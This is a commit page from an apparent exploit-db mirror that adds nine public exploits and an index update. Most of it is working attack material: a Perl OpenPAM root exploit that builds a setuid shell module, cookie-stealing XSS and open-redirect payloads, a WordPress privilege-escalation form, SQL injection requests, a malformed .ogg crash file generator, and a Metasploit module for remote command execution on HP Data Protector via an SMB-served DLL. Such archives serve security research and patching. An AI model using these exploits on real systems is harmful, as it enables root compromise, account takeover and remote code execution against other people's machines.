bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-03-08

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-03-08 08:37:21 +00:00
parent 4b5c85f4cb
commit 65bae5bbd0
10 changed files with 457 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -32715,3 +32715,12 @@ id,file,description,date,author,platform,type,port
36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0
36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0
36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0
36296,platforms/bsd/local/36296.pl,"OpenPAM 'pam_start()' Local Privilege Escalation Vulnerability",2011-11-09,IKCE,bsd,local,0
36297,platforms/php/webapps/36297.txt,"AShop Open-Redirection and Cross Site Scripting Vulnerabilities",2011-11-09,"Infoserve Security Team",php,webapps,0
36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI <= 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0
36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 '.ogg' File Buffer Overflow Vulnerability",2011-11-11,swami,windows,dos,0
36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0
36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0
36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555

Can't render this file because it is too large.

52
platforms/bsd/local/36296.pl Executable file
View file

@ -0,0 +1,52 @@
source: http://www.securityfocus.com/bid/50607/info
OpenPAM is prone to a local privilege-escalation vulnerability.
Local attackers may exploit this issue to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
#!/usr/bin/perl
# kcheckpass invoking pam_start() with user provided
# service argument, what a bad idea. OpenPAM accepts that.
# Maybe this pam_start() vulnerability is exploitable via
# other vectors as well.
# Vuln tested on a FreeBSD 8.1. It does not affect
# Linux PAM, as it is checking for / character
# (C) 2011 by some dude, meant as a PoC! Only use on your own
# machine and on your own risk!!!
#
# This commit is likely to fix the bug:
# http://trac.des.no/openpam/changeset/478/trunk/lib/openpam_configure.c
#
my $kcheckpass = "/usr/local/kde4/lib/kde4/libexec/kcheckpass";
# build suid shell
open(O,">/tmp/slam.c") or die $!;
print O<<EOC;
#include <stdio.h>
#include <unistd.h>
void __attribute__((constructor)) init()
{
char *a[] = {"/bin/sh", NULL};
setuid(0);
execve(*a, a, NULL);
}
EOC
close(O);
# build fake pam module
system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o");
# build fake PAM service file
open(O,">/tmp/pamslam") or die $!;
print O<<EOP;
auth sufficient /tmp/slam.so
EOP
close(O);
print "We need more Elchsalami! Happy birthday dude!\n";
exec("$kcheckpass -c ../../../tmp/pamslam -m classic");

17
platforms/java/webapps/36299.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/50646/info
Infoblox NetMRI is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Infoblox NetMRI versions 6.2.1, 6.1.2, and 6.0.2.42 are vulnerable; other versions may also be affected.
POST /netmri/config/userAdmin/login.tdf HTTP/1.1
Content-Length: 691
Cookie: XXXX
Host: netmrihost:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false

27
platforms/php/webapps/36297.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/50616/info
AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible.
Versions prior to AShop 5.1.4 are vulnerable.
IE8
http://www.example.com/ashop/?&#039;"<script>alert(document.cookie)</script>
http://www.example.com/ashop/index.php?&#039;"<script>alert(document.cookie)</script>
http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns="
http://www.example.com/ashop/index.php?language=&#039;"<script>alert(document.cookie)</script>
FF 7.1
http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp=&#039;"</script><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.php&shop=1
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=&#039;"</script><script>alert(document.cookie)</script>&msg=
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg=&#039;"</script><script>alert(document.cookie)</script>
http://www.example.com/ashop/basket.php?cat=0&sid=&#039;"</script><script>alert(document.cookie)</script>&shop=1&payoption=3
Open Redirection
http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com
http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com
http://www.example.com/ashop/currency.php?redirect=http://www.google.com

9
platforms/php/webapps/36298.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50637/info
Joomla! 'com_alfcontact' extension is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! 'com_alfcontact' extension 1.9.3 is vulnerable; prior versions may also be affected.
&email=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&emailid=5%2c%2cCareers%20at%20Foreground%20Security&emailto_id=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&extravalue=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&message=20&name=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&option=com_alfcontact&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge&subject=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&task=sendemail

47
platforms/php/webapps/36301.txt Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation
# Date: 24-11-2014
# Software Link: https://wordpress.org/plugins/download-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9260
1. Description
Every registered user can update every WordPress options using basic_settings() function.
function basic_settings()
{
if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {
foreach ($_POST as $optn => $optv) {
update_option($optn, $optv);
}
if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');
die('Settings Saved Successfully');
}
include('settings/basic.php');
}
http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html
2. Proof of Concept
Login as standard user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
<input type="hidden" name="task" value="wdm_save_settings">
<input type="hidden" name="section" value="basic">
<input type="hidden" name="default_role" value="administrator">
<input type="submit" value="Hack!">
</form>
After that create new user using wp-login.php?action=register. Newly created user will have admin privileges.
3. Solution:
Update to version 2.7.3

7
platforms/php/webapps/36302.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50656/info
Content component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]

90
platforms/php/webapps/36303.txt Executable file
View file

@ -0,0 +1,90 @@
#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/download/67/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
GET /projectsend/users-edit.php?id=<SQL INJECTION HERE> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456;
PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
Connection: keep-alive
- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code:
if (isset($_GET['id'])) {
$client_id = mysql_real_escape_string($_GET['id']);
/**
* Check if the id corresponds to a real client.
* Return 1 if true, 2 if false.
**/
$page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
/**
* Return 0 if the id is not set.
*/
$page_status = 0;
}
/**
* Get the clients information from the database to use on the form.
*/
if ($page_status === 1) {
$editing = $database->query("SELECT * FROM tbl_users WHERE
id=$client_id");
while($data = mysql_fetch_array($editing)) {
$add_client_data_name = $data['name'];
$add_client_data_user = $data['user'];
$add_client_data_email = $data['email'];
$add_client_data_addr = $data['address'];
$add_client_data_phone = $data['phone'];
$add_client_data_intcont = $data['contact'];
if ($data['notify'] == 1) { $add_client_data_notity = 1; }
else { $add_client_data_notity = 0; }
if ($data['active'] == 1) { $add_client_data_active = 1; }
else { $add_client_data_active = 0; }
}
}
::DISCLOSURE::
+ 01/06/2015: Detect vulnerability
+ 01/07/2015: Contact to vendor
+ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
+ 03/05/2015: Public information
::REFERENCE::
-
http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in
-projectsend-r561-76.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
Best Regards,
---------------------------------------------------------------------
ITAS Team (www.itas.vn)

48
platforms/windows/dos/36300.py Executable file
View file

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/50651/info
Kool Media Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Kool Media Converter 2.6.0 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
#
#
# Exploit Title: Kool Media Converter v2.6.0 DOS
# Date: 10/10/2011
# Author: swami
# E-Mail: flavio[dot]baldassi[at]gmail[dot]com
# Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe
# Version: 2.6.0
# Tested on: Windows XP SP3 ENG
#
#--- From Vendor Website
# Kool Media Converter is a sound tool addressed to casual listeners and fervent
# audiophiles likewise. It deals with compatibility problems between your audio files
# and the media player you are using to help you enjoy all the songs you love anyway you like.
#
#--- Description
# Kool Media Converter fails to handle a malformed .ogg file
ogg = b'\x4F\x67\x67\x53' # Capture Pattern OggS in ascii
ogg += b'\x00' # Version currently 0
ogg += b'\x02' # Header Type of page that follows
ogg += b'\x00' * 8 # Granule Position
ogg += b'\xCE\xc6\x41\x49' # Bitstream Serial Number
ogg += b'\x00' * 4 # Page Sequence Number
ogg += b'\x70\x79\xf3\x3d' # Checksum
ogg += b'\x01' # Page Segment max 255
ogg += b'\x1e\x01\x76\x6f' # Segment Table
ogg += b'\x41' * 1000
try:
f = open('koolPoC.ogg','wb')
f.write(ogg)
f.close()
except:
print('\nError while creating ogg file\n')

151
platforms/windows/remote/36304.rb Executable file
View file

@ -0,0 +1,151 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'HP Data Protector 8.10 Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
commands can be execute by sending crafted requests with opcode 28 to the OmniInet
service listening on the TCP/5555 port. Since there is an strict length limitation on
the command, rundll32.exe is executed, and the payload is provided through a DLL by a
fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
Windows 7 SP1.
},
'Author' => [
'Christian Ramirez', # POC
'Henoch Barrera', # POC
'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module
],
'References' =>
[
['CVE', '2014-2623'],
['OSVDB', '109069'],
['EDB', '34066'],
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Privileged' => true,
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'HP Data Protector 8.10 / Windows', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 02 2014'))
register_options(
[
Opt::RPORT(5555),
OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
], self.class)
deregister_options('FOLDER_NAME')
deregister_options('FILE_CONTENTS')
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end
if minor < 11
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Detected
end
def peer
"#{rhost}:#{rport}"
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
if resp.nil?
return nil
end
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
end
def send_pkt(cmd)
cmd.gsub!("\\", "\\\\\\\\")
pkt = "2\x00"
pkt << "\x01\x01\x01\x01\x01\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x01\x00 "
pkt << "28\x00"
pkt << "\\perl.exe\x00 "
pkt << "-esystem('#{cmd}')\x00"
connect
sock.put([pkt.length].pack('N') + pkt)
disconnect
end
def primer
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
print_status("#{peer} - Trying to execute remote DLL...")
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
send_pkt(sploit)
end
def setup
super
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
unless file_name =~ /\.dll$/
fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
end
end
def exploit
begin
Timeout.timeout(datastore['SMB_DELAY']) {super}
rescue Timeout::Error
# do nothing... just finish exploit and stop smb server...
end
end
end